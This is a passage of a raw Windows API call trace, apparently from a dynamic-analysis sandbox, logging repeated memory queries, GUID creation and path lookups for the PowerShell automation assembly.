0x30 [0091.291] VirtualQuery (in: lpAddress=0x16bba0, lpBuffer=0x16ca60, dwLength=0x30 | out: lpBuffer=0x16ca60*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.291] VirtualQuery (in: lpAddress=0x16bed0, lpBuffer=0x16cd90, dwLength=0x30 | out: lpBuffer=0x16cd90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.293] VirtualQuery (in: lpAddress=0x16bf60, lpBuffer=0x16ce20, dwLength=0x30 | out: lpBuffer=0x16ce20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.293] VirtualQuery (in: lpAddress=0x16bed0, lpBuffer=0x16cd90, dwLength=0x30 | out: lpBuffer=0x16cd90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.294] VirtualQuery (in: lpAddress=0x16bf60, lpBuffer=0x16ce20, dwLength=0x30 | out: lpBuffer=0x16ce20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.295] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x85524718, Data2=0xfdbb, Data3=0x4db9, Data4=([0]=0xab, [1]=0x2e, [2]=0xf9, [3]=0xa6, [4]=0x10, [5]=0xbf, [6]=0x37, [7]=0xab))) returned 0x0 [0091.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.297] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x1a5c6cbd, Data2=0xc36c, Data3=0x476d, Data4=([0]=0x88, [1]=0x71, [2]=0x6b, [3]=0xaf, [4]=0x40, [5]=0x3a, [6]=0x5e, [7]=0x3f))) returned 0x0 [0091.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.303] VirtualQuery (in: lpAddress=0x16b5d0, lpBuffer=0x16c490, dwLength=0x30 | out: lpBuffer=0x16c490*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.305] VirtualQuery (in: lpAddress=0x16b5d0, lpBuffer=0x16c490, dwLength=0x30 | out: lpBuffer=0x16c490*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.306] VirtualQuery (in: lpAddress=0x16b660, lpBuffer=0x16c520, dwLength=0x30 | out: lpBuffer=0x16c520*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.308] VirtualQuery (in: lpAddress=0x16b5d0, lpBuffer=0x16c490, dwLength=0x30 | out: lpBuffer=0x16c490*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.310] VirtualQuery (in: lpAddress=0x16b660, lpBuffer=0x16c520, dwLength=0x30 | out: lpBuffer=0x16c520*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.325] VirtualQuery (in: lpAddress=0x16b5d0, lpBuffer=0x16c490, dwLength=0x30 | out: lpBuffer=0x16c490*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.325] VirtualQuery (in: lpAddress=0x16b660, lpBuffer=0x16c520, dwLength=0x30 | out: lpBuffer=0x16c520*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.326] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.327] VirtualQuery (in: lpAddress=0x16b5d0, lpBuffer=0x16c490, dwLength=0x30 | out: lpBuffer=0x16c490*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.328] VirtualQuery (in: lpAddress=0x16b660, lpBuffer=0x16c520, dwLength=0x30 | out: lpBuffer=0x16c520*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.332] VirtualQuery (in: lpAddress=0x16b5d0, lpBuffer=0x16c490, dwLength=0x30 | out: lpBuffer=0x16c490*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.333] VirtualQuery (in: lpAddress=0x16b660, lpBuffer=0x16c520, dwLength=0x30 | out: lpBuffer=0x16c520*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.335] VirtualQuery (in: lpAddress=0x16b5d0, lpBuffer=0x16c490, dwLength=0x30 | out: lpBuffer=0x16c490*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.335] VirtualQuery (in: lpAddress=0x16b660, lpBuffer=0x16c520, dwLength=0x30 | out: lpBuffer=0x16c520*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 